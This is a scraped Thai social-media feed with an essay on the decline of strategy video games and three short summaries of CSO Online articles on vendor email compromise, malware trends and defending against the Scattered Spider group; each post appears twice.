    การเกิดขึ้นของสมาร์ตโฟนและเกมบนแพลตฟอร์มมือถือได้เปลี่ยนรูปแบบการบริโภคความบันเทิงของผู้เล่นอย่างสิ้นเชิง เกมแนว Action, MOBA, Battle Royale และเกมกดเล่นเร็ว (Casual Games) กลายเป็นกระแสหลัก เนื่องจากสามารถเข้าถึงง่าย เล่นจบไว และให้ความรู้สึกตื่นเต้นทันใจ

    ในทางกลับกัน เกมแนว Strategy มักต้องอาศัยอุปกรณ์ประสิทธิภาพสูง, หน้าจอขนาดใหญ่, และเวลาเล่นยาวนาน ซึ่งขัดกับวิถีชีวิตของผู้คนในยุคปัจจุบันที่เน้นความรวดเร็วและสะดวกสบาย ส่งผลให้เกมแนวนี้ไม่สามารถแข่งขันในตลาดมือถือที่โตอย่างรวดเร็วได้

    2️⃣ ความซับซ้อนและข้อจำกัดด้านเวลา
    เกมแนว Strategy โดยธรรมชาติแล้วต้องการเวลาในการเรียนรู้ระบบเกม รวมถึงใช้สมาธิในการวางแผน คาดการณ์ และบริหารจัดการ ซึ่งต่างจากเกมแนวอื่นที่สามารถเข้าใจและสนุกได้ทันทีหลังเริ่มเล่น

    สำหรับผู้เล่นยุคใหม่ที่มีเวลาว่างจำกัดและต้องการความบันเทิงแบบ "เข้าใจง่าย-จบเร็ว" เกมแนว Strategy จึงมักถูกมองว่าเข้าถึงยากและไม่คุ้มค่าเวลา

    3️⃣ ทิศทางการตลาดที่เปลี่ยนไป
    อุตสาหกรรมเกมในปัจจุบันขับเคลื่อนด้วยโมเดลการทำกำไรระยะสั้น เช่น ระบบ microtransactions, loot boxes, และ battle passes ซึ่งเน้นการดึงดูดผู้เล่นให้ใช้จ่ายภายในเกมอย่างต่อเนื่อง

    ในขณะที่เกมแนว Strategy มักไม่มีระบบเหล่านี้ หรือมีในลักษณะที่จำกัด ทำให้ผู้พัฒนาหลายรายเลือกไม่ลงทุนสร้างเกมประเภทนี้ และหันไปพัฒนาเกมที่ "ขายได้ง่าย" แทน ส่งผลให้เกม Strategy ใหม่ ๆ ที่มีคุณภาพลดน้อยลง และฐานผู้เล่นใหม่ก็หายไปพร้อมกัน

    ผลกระทบที่อาจเกิดขึ้นจากการลดลงของเกมแนว Strategy
    1️⃣ การถดถอยของทักษะการคิดวิเคราะห์และการวางแผนระยะยาว
    เกมแนว Strategy มีจุดเด่นในการส่งเสริมทักษะด้านตรรกะ การวิเคราะห์ข้อมูล การตัดสินใจท่ามกลางความไม่แน่นอน และการบริหารความเสี่ยง ซึ่งเป็นทักษะที่มีคุณค่ามหาศาลทั้งในชีวิตจริงและโลกการทำงาน

    การที่เกมแนวนี้ลดบทบาทลง อาจหมายถึงช่องทางการฝึกฝนทักษะเหล่านี้ผ่านเกมลดน้อยลงตามไปด้วย โดยเฉพาะในกลุ่มเยาวชนที่เติบโตมากับเกมแนวสั้น ๆ เร้าใจแต่ขาดการกระตุ้นเชิงปัญญา

    2️⃣ การขาดโอกาสในการฝึกฝนการจัดการทรัพยากร
    หนึ่งในองค์ประกอบสำคัญของเกม Strategy คือการบริหารทรัพยากรอย่างมีประสิทธิภาพ เช่น การจัดสรรเงิน, วัตถุดิบ, กำลังพล และเวลาให้เหมาะสมตามสถานการณ์ในเกม ซึ่งสะท้อนถึงทักษะที่สามารถนำไปใช้ได้จริงในการวางแผนชีวิต การเงิน และการบริหารองค์กร

    การขาดเกมที่ส่งเสริมแนวคิดนี้เท่ากับการขาดสภาพแวดล้อมจำลองที่ให้ผู้เล่นได้ฝึกทักษะโดยไม่ต้องเสี่ยงในชีวิตจริง

    3️⃣ การลดลงของความอดทนและทักษะการทำงานร่วมกัน
    เกม Strategy หลายเกมโดยเฉพาะแบบ multiplayer ต้องอาศัยการวางแผนร่วมกัน การประสานงานระหว่างสมาชิกในทีม และความอดทนรอจังหวะที่เหมาะสมในการลงมือ ซึ่งล้วนเป็นสิ่งที่จำเป็นในการทำงานร่วมกับผู้อื่นในสังคมจริง

    ในขณะที่เกมแนวใหม่มักส่งเสริมการแข่งขันแบบทันทีทันใด และเน้นผลลัพธ์ระยะสั้น การสูญเสียเกมที่ฝึกความอดทนและความร่วมมืออาจส่งผลกระทบต่อพฤติกรรมของผู้เล่นในระยะยาว

    แนวทางการฟื้นฟูเกม Strategy ให้กลับมามีบทบาท
    - การพัฒนาเกมให้เหมาะกับแพลตฟอร์มใหม่: นักพัฒนาอาจต้องปรับปรุงเกม Strategy ให้เข้ากับมือถือและแท็บเล็ต โดยเน้น UI ที่เข้าใจง่าย ระบบเล่นสั้นได้แต่มีความลึกในระยะยาว หรือใช้ระบบ cloud gaming เพื่อรองรับการประมวลผล

    - สร้างการตลาดที่เข้าถึงกลุ่มวัยรุ่นและเยาวชน: การรีแบรนด์เกม Strategy ให้ดูทันสมัย และชูจุดเด่นด้านการพัฒนาทักษะชีวิต อาจช่วยดึงดูดผู้เล่นรุ่นใหม่ให้หันกลับมาสนใจ

    - รวมฟีเจอร์ social และระบบ co-op: การผสมผสานเกม Strategy เข้ากับระบบการเล่นแบบร่วมมือหรือแข่งขันเชิงกลยุทธ์ อาจช่วยเพิ่มความสนุก และขยายกลุ่มเป้าหมายไปสู่ผู้เล่นที่ชื่นชอบการสื่อสารและการทำงานเป็นทีม

    สรุป
    ความเสื่อมความนิยมของเกมแนว Strategy ไม่ใช่เพียงแค่การเปลี่ยนรสนิยมของตลาด แต่ยังสะท้อนถึงพฤติกรรมผู้เล่นและโครงสร้างอุตสาหกรรมเกมที่เปลี่ยนไปอย่างรวดเร็ว อย่างไรก็ตาม ความสำคัญของเกมประเภทนี้ในฐานะเครื่องมือฝึกทักษะเชิงปัญญาและการบริหารจัดการยังไม่เสื่อมคลาย

    หากผู้พัฒนาเกมและผู้มีส่วนเกี่ยวข้องสามารถปรับตัวและออกแบบประสบการณ์เกมที่เหมาะสมกับยุคสมัยได้ เกมแนว Strategy ก็ยังมีโอกาสกลับมายืนในแถวหน้าอีกครั้ง พร้อมทั้งสร้างสรรค์สังคมของผู้เล่นที่เก่งคิด เก่งวางแผน และพร้อมรับมือกับความท้าทายของโลกจริงได้อย่างมั่นใจ

    #ลุงเขียนหลานอ่าน
    🕹️ การเสื่อมถอยของเกมแนววางแผน (Strategy): สะท้อนภาพความเปลี่ยนแปลงของอุตสาหกรรมเกมและพฤติกรรมผู้เล่น เกมประเภทวางแผนหรือ Strategy เคยยืนอยู่แถวหน้าในโลกของวิดีโอเกม โดยเฉพาะในช่วงยุค 90 ถึงต้นยุค 2000 ซึ่งเต็มไปด้วยเกมระดับตำนานอย่าง Age of Empires, StarCraft, Command & Conquer, และ Civilization ที่ไม่เพียงแต่มอบประสบการณ์ความสนุกเร้าใจ แต่ยังฝึกฝนทักษะสำคัญ เช่น การคิดวิเคราะห์ การตัดสินใจเชิงกลยุทธ์ และการบริหารจัดการทรัพยากร อย่างไรก็ตาม ท่ามกลางความก้าวหน้าทางเทคโนโลยีและการเปลี่ยนแปลงของพฤติกรรมผู้เล่นในยุคดิจิทัล ความนิยมของเกมแนว Strategy กลับลดลงอย่างต่อเนื่อง ทำให้คำถามเกิดขึ้นว่า "เหตุใดเกมแนวที่เคยรุ่งโรจน์จึงเริ่มถูกลืม?" บทความนี้จะพาไปสำรวจต้นเหตุของการเปลี่ยนแปลงนี้ พร้อมทั้งวิเคราะห์ผลกระทบที่อาจเกิดขึ้นต่อทักษะของผู้เล่น และแนวทางในการฟื้นฟูเกมแนว Strategy ให้กลับมามีบทบาทอีกครั้ง 🌚 สาเหตุหลักที่ทำให้เกมแนว Strategy เสื่อมความนิยม 1️⃣ การเปลี่ยนผ่านของเทคโนโลยีและแพลตฟอร์มการเล่น การเกิดขึ้นของสมาร์ตโฟนและเกมบนแพลตฟอร์มมือถือได้เปลี่ยนรูปแบบการบริโภคความบันเทิงของผู้เล่นอย่างสิ้นเชิง เกมแนว Action, MOBA, Battle Royale และเกมกดเล่นเร็ว (Casual Games) กลายเป็นกระแสหลัก เนื่องจากสามารถเข้าถึงง่าย เล่นจบไว และให้ความรู้สึกตื่นเต้นทันใจ ในทางกลับกัน เกมแนว Strategy มักต้องอาศัยอุปกรณ์ประสิทธิภาพสูง, หน้าจอขนาดใหญ่, และเวลาเล่นยาวนาน ซึ่งขัดกับวิถีชีวิตของผู้คนในยุคปัจจุบันที่เน้นความรวดเร็วและสะดวกสบาย ส่งผลให้เกมแนวนี้ไม่สามารถแข่งขันในตลาดมือถือที่โตอย่างรวดเร็วได้ 2️⃣ ความซับซ้อนและข้อจำกัดด้านเวลา เกมแนว Strategy โดยธรรมชาติแล้วต้องการเวลาในการเรียนรู้ระบบเกม รวมถึงใช้สมาธิในการวางแผน คาดการณ์ และบริหารจัดการ ซึ่งต่างจากเกมแนวอื่นที่สามารถเข้าใจและสนุกได้ทันทีหลังเริ่มเล่น สำหรับผู้เล่นยุคใหม่ที่มีเวลาว่างจำกัดและต้องการความบันเทิงแบบ "เข้าใจง่าย-จบเร็ว" เกมแนว Strategy จึงมักถูกมองว่าเข้าถึงยากและไม่คุ้มค่าเวลา 3️⃣ ทิศทางการตลาดที่เปลี่ยนไป อุตสาหกรรมเกมในปัจจุบันขับเคลื่อนด้วยโมเดลการทำกำไรระยะสั้น เช่น ระบบ microtransactions, loot boxes, และ battle passes ซึ่งเน้นการดึงดูดผู้เล่นให้ใช้จ่ายภายในเกมอย่างต่อเนื่อง ในขณะที่เกมแนว Strategy มักไม่มีระบบเหล่านี้ หรือมีในลักษณะที่จำกัด ทำให้ผู้พัฒนาหลายรายเลือกไม่ลงทุนสร้างเกมประเภทนี้ และหันไปพัฒนาเกมที่ "ขายได้ง่าย" แทน ส่งผลให้เกม Strategy ใหม่ ๆ ที่มีคุณภาพลดน้อยลง และฐานผู้เล่นใหม่ก็หายไปพร้อมกัน 🌏 ผลกระทบที่อาจเกิดขึ้นจากการลดลงของเกมแนว Strategy 1️⃣ การถดถอยของทักษะการคิดวิเคราะห์และการวางแผนระยะยาว เกมแนว Strategy มีจุดเด่นในการส่งเสริมทักษะด้านตรรกะ การวิเคราะห์ข้อมูล การตัดสินใจท่ามกลางความไม่แน่นอน และการบริหารความเสี่ยง ซึ่งเป็นทักษะที่มีคุณค่ามหาศาลทั้งในชีวิตจริงและโลกการทำงาน การที่เกมแนวนี้ลดบทบาทลง อาจหมายถึงช่องทางการฝึกฝนทักษะเหล่านี้ผ่านเกมลดน้อยลงตามไปด้วย โดยเฉพาะในกลุ่มเยาวชนที่เติบโตมากับเกมแนวสั้น ๆ เร้าใจแต่ขาดการกระตุ้นเชิงปัญญา 2️⃣ การขาดโอกาสในการฝึกฝนการจัดการทรัพยากร หนึ่งในองค์ประกอบสำคัญของเกม Strategy คือการบริหารทรัพยากรอย่างมีประสิทธิภาพ เช่น การจัดสรรเงิน, วัตถุดิบ, กำลังพล และเวลาให้เหมาะสมตามสถานการณ์ในเกม ซึ่งสะท้อนถึงทักษะที่สามารถนำไปใช้ได้จริงในการวางแผนชีวิต การเงิน และการบริหารองค์กร การขาดเกมที่ส่งเสริมแนวคิดนี้เท่ากับการขาดสภาพแวดล้อมจำลองที่ให้ผู้เล่นได้ฝึกทักษะโดยไม่ต้องเสี่ยงในชีวิตจริง 3️⃣ การลดลงของความอดทนและทักษะการทำงานร่วมกัน เกม Strategy หลายเกมโดยเฉพาะแบบ multiplayer ต้องอาศัยการวางแผนร่วมกัน การประสานงานระหว่างสมาชิกในทีม และความอดทนรอจังหวะที่เหมาะสมในการลงมือ ซึ่งล้วนเป็นสิ่งที่จำเป็นในการทำงานร่วมกับผู้อื่นในสังคมจริง ในขณะที่เกมแนวใหม่มักส่งเสริมการแข่งขันแบบทันทีทันใด และเน้นผลลัพธ์ระยะสั้น การสูญเสียเกมที่ฝึกความอดทนและความร่วมมืออาจส่งผลกระทบต่อพฤติกรรมของผู้เล่นในระยะยาว ✅ แนวทางการฟื้นฟูเกม Strategy ให้กลับมามีบทบาท - การพัฒนาเกมให้เหมาะกับแพลตฟอร์มใหม่: นักพัฒนาอาจต้องปรับปรุงเกม Strategy ให้เข้ากับมือถือและแท็บเล็ต โดยเน้น UI ที่เข้าใจง่าย ระบบเล่นสั้นได้แต่มีความลึกในระยะยาว หรือใช้ระบบ cloud gaming เพื่อรองรับการประมวลผล - สร้างการตลาดที่เข้าถึงกลุ่มวัยรุ่นและเยาวชน: การรีแบรนด์เกม Strategy ให้ดูทันสมัย และชูจุดเด่นด้านการพัฒนาทักษะชีวิต อาจช่วยดึงดูดผู้เล่นรุ่นใหม่ให้หันกลับมาสนใจ - รวมฟีเจอร์ social และระบบ co-op: การผสมผสานเกม Strategy เข้ากับระบบการเล่นแบบร่วมมือหรือแข่งขันเชิงกลยุทธ์ อาจช่วยเพิ่มความสนุก และขยายกลุ่มเป้าหมายไปสู่ผู้เล่นที่ชื่นชอบการสื่อสารและการทำงานเป็นทีม ℹ️ℹ️ สรุป ℹ️ℹ️ ความเสื่อมความนิยมของเกมแนว Strategy ไม่ใช่เพียงแค่การเปลี่ยนรสนิยมของตลาด แต่ยังสะท้อนถึงพฤติกรรมผู้เล่นและโครงสร้างอุตสาหกรรมเกมที่เปลี่ยนไปอย่างรวดเร็ว อย่างไรก็ตาม ความสำคัญของเกมประเภทนี้ในฐานะเครื่องมือฝึกทักษะเชิงปัญญาและการบริหารจัดการยังไม่เสื่อมคลาย หากผู้พัฒนาเกมและผู้มีส่วนเกี่ยวข้องสามารถปรับตัวและออกแบบประสบการณ์เกมที่เหมาะสมกับยุคสมัยได้ เกมแนว Strategy ก็ยังมีโอกาสกลับมายืนในแถวหน้าอีกครั้ง พร้อมทั้งสร้างสรรค์สังคมของผู้เล่นที่เก่งคิด เก่งวางแผน และพร้อมรับมือกับความท้าทายของโลกจริงได้อย่างมั่นใจ #ลุงเขียนหลานอ่าน
    1 ความคิดเห็น 0 การแบ่งปัน 405 มุมมอง 0 รีวิว
  • Vendor Email Compromise (VEC): ภัยเงียบที่สร้างความเสียหายกว่า $300 ล้าน
    Vendor Email Compromise (VEC) เป็น รูปแบบการโจมตีทางไซเบอร์ที่ใช้ AI เพื่อเลียนแบบอีเมลธุรกิจจริง ทำให้สามารถ หลอกลวงพนักงานให้ตอบกลับหรือส่งข้อมูลสำคัญ โดยไม่ต้องใช้ลิงก์หรือไฟล์แนบ

    รายงานจาก Abnormal AI พบว่า 72% ของพนักงานในองค์กรขนาดใหญ่มีปฏิสัมพันธ์กับอีเมล VEC โดย ตอบกลับหรือส่งต่ออีเมลที่ไม่มีลิงก์หรือไฟล์แนบ ซึ่งช่วยให้แฮกเกอร์สามารถ เข้าถึงข้อมูลสำคัญและดำเนินการฉ้อโกงทางการเงิน

    VEC มีอัตราการมีส่วนร่วมสูงกว่า Business Email Compromise (BEC) ถึง 90% และสร้างความเสียหายทางการเงินรวมกว่า $300 ล้านทั่วโลกในปีที่ผ่านมา

    ข้อมูลจากข่าว
    - VEC ใช้ AI เพื่อเลียนแบบอีเมลธุรกิจจริง ทำให้สามารถหลอกลวงพนักงานได้ง่ายขึ้น
    - 72% ของพนักงานในองค์กรขนาดใหญ่มีปฏิสัมพันธ์กับอีเมล VEC
    - VEC มีอัตราการมีส่วนร่วมสูงกว่า BEC ถึง 90%
    - ความเสียหายทางการเงินจาก VEC รวมกว่า $300 ล้านทั่วโลกในปีที่ผ่านมา
    - ภูมิภาค EMEA (ยุโรป, ตะวันออกกลาง, แอฟริกา) มีอัตราการมีส่วนร่วมสูงสุด แต่มีอัตราการรายงานต่ำสุดเพียง 0.27%

    คำเตือนที่ควรพิจารณา
    - พนักงานในอุตสาหกรรมโทรคมนาคมมีความเสี่ยงสูงสุด โดยมีอัตราการมีส่วนร่วมถึง 71.3%
    - VEC สามารถหลีกเลี่ยงการตรวจจับของระบบ Multi-Factor Authentication (MFA) และตัวกรองอีเมลแบบเดิม
    - 98.5% ของ VEC scams ไม่ได้รับการรายงาน และมักถูกค้นพบหลังจากเกิดความเสียหายทางการเงินแล้ว
    - องค์กรต้องปรับกลยุทธ์ด้านความปลอดภัย โดยเน้นการตรวจจับพฤติกรรมทางจิตวิทยาแทนการตรวจสอบข้อมูลรับรอง

    ผู้เชี่ยวชาญแนะนำให้ องค์กรใช้ AI-powered email analytics เพื่อตรวจจับความผิดปกติในอีเมล รวมถึง เพิ่มมาตรการตรวจสอบผู้ขาย และฝึกอบรมพนักงานให้รู้จักการโจมตีแบบ social engineering

    https://www.csoonline.com/article/4001733/vendor-email-compromise-the-silent-300m-threat-cisos-cant-ignore.html
    📧 Vendor Email Compromise (VEC): ภัยเงียบที่สร้างความเสียหายกว่า $300 ล้าน Vendor Email Compromise (VEC) เป็น รูปแบบการโจมตีทางไซเบอร์ที่ใช้ AI เพื่อเลียนแบบอีเมลธุรกิจจริง ทำให้สามารถ หลอกลวงพนักงานให้ตอบกลับหรือส่งข้อมูลสำคัญ โดยไม่ต้องใช้ลิงก์หรือไฟล์แนบ รายงานจาก Abnormal AI พบว่า 72% ของพนักงานในองค์กรขนาดใหญ่มีปฏิสัมพันธ์กับอีเมล VEC โดย ตอบกลับหรือส่งต่ออีเมลที่ไม่มีลิงก์หรือไฟล์แนบ ซึ่งช่วยให้แฮกเกอร์สามารถ เข้าถึงข้อมูลสำคัญและดำเนินการฉ้อโกงทางการเงิน VEC มีอัตราการมีส่วนร่วมสูงกว่า Business Email Compromise (BEC) ถึง 90% และสร้างความเสียหายทางการเงินรวมกว่า $300 ล้านทั่วโลกในปีที่ผ่านมา ✅ ข้อมูลจากข่าว - VEC ใช้ AI เพื่อเลียนแบบอีเมลธุรกิจจริง ทำให้สามารถหลอกลวงพนักงานได้ง่ายขึ้น - 72% ของพนักงานในองค์กรขนาดใหญ่มีปฏิสัมพันธ์กับอีเมล VEC - VEC มีอัตราการมีส่วนร่วมสูงกว่า BEC ถึง 90% - ความเสียหายทางการเงินจาก VEC รวมกว่า $300 ล้านทั่วโลกในปีที่ผ่านมา - ภูมิภาค EMEA (ยุโรป, ตะวันออกกลาง, แอฟริกา) มีอัตราการมีส่วนร่วมสูงสุด แต่มีอัตราการรายงานต่ำสุดเพียง 0.27% ‼️ คำเตือนที่ควรพิจารณา - พนักงานในอุตสาหกรรมโทรคมนาคมมีความเสี่ยงสูงสุด โดยมีอัตราการมีส่วนร่วมถึง 71.3% - VEC สามารถหลีกเลี่ยงการตรวจจับของระบบ Multi-Factor Authentication (MFA) และตัวกรองอีเมลแบบเดิม - 98.5% ของ VEC scams ไม่ได้รับการรายงาน และมักถูกค้นพบหลังจากเกิดความเสียหายทางการเงินแล้ว - องค์กรต้องปรับกลยุทธ์ด้านความปลอดภัย โดยเน้นการตรวจจับพฤติกรรมทางจิตวิทยาแทนการตรวจสอบข้อมูลรับรอง ผู้เชี่ยวชาญแนะนำให้ องค์กรใช้ AI-powered email analytics เพื่อตรวจจับความผิดปกติในอีเมล รวมถึง เพิ่มมาตรการตรวจสอบผู้ขาย และฝึกอบรมพนักงานให้รู้จักการโจมตีแบบ social engineering https://www.csoonline.com/article/4001733/vendor-email-compromise-the-silent-300m-threat-cisos-cant-ignore.html
    WWW.CSOONLINE.COM
    Vendor email compromise: The silent $300M threat CISOs can’t ignore
    AI-crafted VEC scams are bypassing MFA, legacy filters, and employee awareness, demanding a fundamental shift in enterprise email defense strategy.
    0 ความคิดเห็น 0 การแบ่งปัน 339 มุมมอง 0 รีวิว
  • ข่าวล่าสุดเกี่ยวกับแนวโน้มมัลแวร์ที่กำลังเพิ่มขึ้นเผยให้เห็นถึงการเปลี่ยนแปลงสำคัญในกลยุทธ์ของอาชญากรไซเบอร์ โดยมีการใช้ AI และเทคนิคใหม่ ๆ เพื่อหลีกเลี่ยงการตรวจจับและเพิ่มประสิทธิภาพในการโจมตี

    มัลแวร์กำลังพัฒนาไปอย่างรวดเร็ว โดยเฉพาะ infostealers ที่ขโมยข้อมูลสำคัญ เช่น คุกกี้เบราว์เซอร์, ข้อมูล VPN, โทเค็น MFA และกระเป๋าเงินคริปโต ซึ่งถูกขายในตลาดมืดเพื่อให้แฮกเกอร์สามารถเข้าถึงระบบองค์กรได้ง่ายขึ้น

    นอกจากนี้ มัลแวร์ที่ใช้วิศวกรรมสังคม (social engineering) กำลังเพิ่มขึ้น โดยใช้เทคนิค ClickFix ที่หลอกให้ผู้ใช้คัดลอกและวางโค้ดที่เป็นอันตรายลงในระบบของตนเอง

    ข้อมูลจากข่าว
    - infostealers เพิ่มขึ้น 58% ในปีที่ผ่านมา และรับผิดชอบต่อ 75% ของข้อมูลที่ถูกขโมย
    - มัลแวร์ที่ฝังอยู่ในแพ็กเกจสำหรับนักพัฒนา เพิ่มขึ้น 156% โดยพบมากใน NPM, PyPI และ HuggingFace
    - แรนซัมแวร์กำลังเปลี่ยนไปใช้การโจมตีแบบเจาะจง โดยเน้นการขโมยข้อมูลก่อนเข้ารหัสไฟล์
    - มัลแวร์ที่ใช้วิศวกรรมสังคม เช่น ClickFix กำลังแพร่หลายมากขึ้น

    คำเตือนที่ควรพิจารณา
    - องค์กรควรตรวจสอบการตั้งค่าความปลอดภัยของระบบ เพื่อป้องกันการโจมตีจาก infostealers
    - นักพัฒนาควรตรวจสอบแพ็กเกจที่ใช้ เพื่อหลีกเลี่ยงมัลแวร์ที่ฝังอยู่ในเครื่องมือพัฒนา
    - ผู้ใช้ควรระวังการโจมตีแบบ ClickFix ซึ่งอาจทำให้พวกเขาติดตั้งมัลแวร์โดยไม่รู้ตัว
    - แรนซัมแวร์กำลังเปลี่ยนกลยุทธ์ จากการเข้ารหัสไฟล์ไปเป็นการขโมยข้อมูลและขู่กรรโชก

    แนวโน้มมัลแวร์ที่เพิ่มขึ้นแสดงให้เห็นถึงความจำเป็นที่องค์กรและผู้ใช้ทั่วไปต้องปรับตัวและเพิ่มมาตรการป้องกันเพื่อรับมือกับภัยคุกคามที่ซับซ้อนมากขึ้น

    https://www.csoonline.com/article/3997388/6-rising-malware-trends-every-security-pro-should-know.html
    ข่าวล่าสุดเกี่ยวกับแนวโน้มมัลแวร์ที่กำลังเพิ่มขึ้นเผยให้เห็นถึงการเปลี่ยนแปลงสำคัญในกลยุทธ์ของอาชญากรไซเบอร์ โดยมีการใช้ AI และเทคนิคใหม่ ๆ เพื่อหลีกเลี่ยงการตรวจจับและเพิ่มประสิทธิภาพในการโจมตี มัลแวร์กำลังพัฒนาไปอย่างรวดเร็ว โดยเฉพาะ infostealers ที่ขโมยข้อมูลสำคัญ เช่น คุกกี้เบราว์เซอร์, ข้อมูล VPN, โทเค็น MFA และกระเป๋าเงินคริปโต ซึ่งถูกขายในตลาดมืดเพื่อให้แฮกเกอร์สามารถเข้าถึงระบบองค์กรได้ง่ายขึ้น นอกจากนี้ มัลแวร์ที่ใช้วิศวกรรมสังคม (social engineering) กำลังเพิ่มขึ้น โดยใช้เทคนิค ClickFix ที่หลอกให้ผู้ใช้คัดลอกและวางโค้ดที่เป็นอันตรายลงในระบบของตนเอง ✅ ข้อมูลจากข่าว - infostealers เพิ่มขึ้น 58% ในปีที่ผ่านมา และรับผิดชอบต่อ 75% ของข้อมูลที่ถูกขโมย - มัลแวร์ที่ฝังอยู่ในแพ็กเกจสำหรับนักพัฒนา เพิ่มขึ้น 156% โดยพบมากใน NPM, PyPI และ HuggingFace - แรนซัมแวร์กำลังเปลี่ยนไปใช้การโจมตีแบบเจาะจง โดยเน้นการขโมยข้อมูลก่อนเข้ารหัสไฟล์ - มัลแวร์ที่ใช้วิศวกรรมสังคม เช่น ClickFix กำลังแพร่หลายมากขึ้น ‼️ คำเตือนที่ควรพิจารณา - องค์กรควรตรวจสอบการตั้งค่าความปลอดภัยของระบบ เพื่อป้องกันการโจมตีจาก infostealers - นักพัฒนาควรตรวจสอบแพ็กเกจที่ใช้ เพื่อหลีกเลี่ยงมัลแวร์ที่ฝังอยู่ในเครื่องมือพัฒนา - ผู้ใช้ควรระวังการโจมตีแบบ ClickFix ซึ่งอาจทำให้พวกเขาติดตั้งมัลแวร์โดยไม่รู้ตัว - แรนซัมแวร์กำลังเปลี่ยนกลยุทธ์ จากการเข้ารหัสไฟล์ไปเป็นการขโมยข้อมูลและขู่กรรโชก แนวโน้มมัลแวร์ที่เพิ่มขึ้นแสดงให้เห็นถึงความจำเป็นที่องค์กรและผู้ใช้ทั่วไปต้องปรับตัวและเพิ่มมาตรการป้องกันเพื่อรับมือกับภัยคุกคามที่ซับซ้อนมากขึ้น https://www.csoonline.com/article/3997388/6-rising-malware-trends-every-security-pro-should-know.html
    WWW.CSOONLINE.COM
    6 rising malware trends every security pro should know
    From infostealers commoditizing initial access to a more targeted approach to ransomware attacks, cybercriminals’ malware tools, tactics, and techniques are evolving rapidly.
    0 ความคิดเห็น 0 การแบ่งปัน 218 มุมมอง 0 รีวิว
  • CISOs ควรเตรียมรับมือกับการโจมตีของ Scattered Spider

    Scattered Spider เป็นกลุ่มแฮกเกอร์ที่มีชื่อเสียงด้านการโจมตีองค์กรขนาดใหญ่ โดยล่าสุด Marks & Spencer, Harrods และ Co-op ในสหราชอาณาจักรตกเป็นเป้าหมาย ซึ่งสร้างความเสียหายทางธุรกิจมหาศาล และคาดว่า กลุ่มนี้จะขยายการโจมตีไปยังสหรัฐฯ

    รายละเอียดสำคัญเกี่ยวกับ Scattered Spider และแนวทางป้องกัน
    Scattered Spider เป็นกลุ่มแฮกเกอร์ที่มีความเชี่ยวชาญด้าน Social Engineering
    - ใช้ เทคนิคหลอกลวงพนักงานและฝ่ายสนับสนุนลูกค้าเพื่อเข้าถึงระบบ

    กลุ่มนี้ร่วมมือกับ DragonForce ซึ่งเป็นกลุ่ม Ransomware-as-a-Service
    - DragonForce อาจมีความเกี่ยวข้องกับหน่วยข่าวกรองรัสเซีย

    Scattered Spider เปลี่ยนกลยุทธ์จาก Phishing เป็น Social Engineering
    - ใช้ SIM Swapping และการปลอมตัวเป็นพนักงานเพื่อขอรีเซ็ตรหัสผ่าน

    CISOs ควรให้ความสำคัญกับการฝึกอบรมพนักงานเกี่ยวกับภัยคุกคามทางไซเบอร์
    - โดยเฉพาะ ฝ่ายสนับสนุนลูกค้าและพนักงานที่มีสิทธิ์เข้าถึงระบบ

    ควรมีระบบตรวจจับพฤติกรรมที่ผิดปกติของผู้ใช้ในเครือข่าย
    - เช่น การเข้าถึงข้อมูลที่ไม่เกี่ยวข้องกับหน้าที่ของพนักงาน

    หากถูกโจมตี ควรใช้การกู้คืนข้อมูลจาก Backup แทนการจ่ายค่าไถ่
    - การจ่ายค่าไถ่ ไม่รับประกันว่าข้อมูลจะไม่ถูกเผยแพร่

    https://www.csoonline.com/article/3994369/how-cisos-can-defend-against-scattered-spider-ransomware-attacks.html
    CISOs ควรเตรียมรับมือกับการโจมตีของ Scattered Spider Scattered Spider เป็นกลุ่มแฮกเกอร์ที่มีชื่อเสียงด้านการโจมตีองค์กรขนาดใหญ่ โดยล่าสุด Marks & Spencer, Harrods และ Co-op ในสหราชอาณาจักรตกเป็นเป้าหมาย ซึ่งสร้างความเสียหายทางธุรกิจมหาศาล และคาดว่า กลุ่มนี้จะขยายการโจมตีไปยังสหรัฐฯ 🔍 รายละเอียดสำคัญเกี่ยวกับ Scattered Spider และแนวทางป้องกัน ✅ Scattered Spider เป็นกลุ่มแฮกเกอร์ที่มีความเชี่ยวชาญด้าน Social Engineering - ใช้ เทคนิคหลอกลวงพนักงานและฝ่ายสนับสนุนลูกค้าเพื่อเข้าถึงระบบ ✅ กลุ่มนี้ร่วมมือกับ DragonForce ซึ่งเป็นกลุ่ม Ransomware-as-a-Service - DragonForce อาจมีความเกี่ยวข้องกับหน่วยข่าวกรองรัสเซีย ✅ Scattered Spider เปลี่ยนกลยุทธ์จาก Phishing เป็น Social Engineering - ใช้ SIM Swapping และการปลอมตัวเป็นพนักงานเพื่อขอรีเซ็ตรหัสผ่าน ✅ CISOs ควรให้ความสำคัญกับการฝึกอบรมพนักงานเกี่ยวกับภัยคุกคามทางไซเบอร์ - โดยเฉพาะ ฝ่ายสนับสนุนลูกค้าและพนักงานที่มีสิทธิ์เข้าถึงระบบ ✅ ควรมีระบบตรวจจับพฤติกรรมที่ผิดปกติของผู้ใช้ในเครือข่าย - เช่น การเข้าถึงข้อมูลที่ไม่เกี่ยวข้องกับหน้าที่ของพนักงาน ✅ หากถูกโจมตี ควรใช้การกู้คืนข้อมูลจาก Backup แทนการจ่ายค่าไถ่ - การจ่ายค่าไถ่ ไม่รับประกันว่าข้อมูลจะไม่ถูกเผยแพร่ https://www.csoonline.com/article/3994369/how-cisos-can-defend-against-scattered-spider-ransomware-attacks.html
    WWW.CSOONLINE.COM
    How CISOs can defend against Scattered Spider ransomware attacks
    CISOs should fortify help desk and employee defenses, enhance intrusion detection and tracking capabilities, and recognize that paying ransoms is not a viable strategy.
    0 ความคิดเห็น 0 การแบ่งปัน 336 มุมมอง 0 รีวิว
Pages Boosts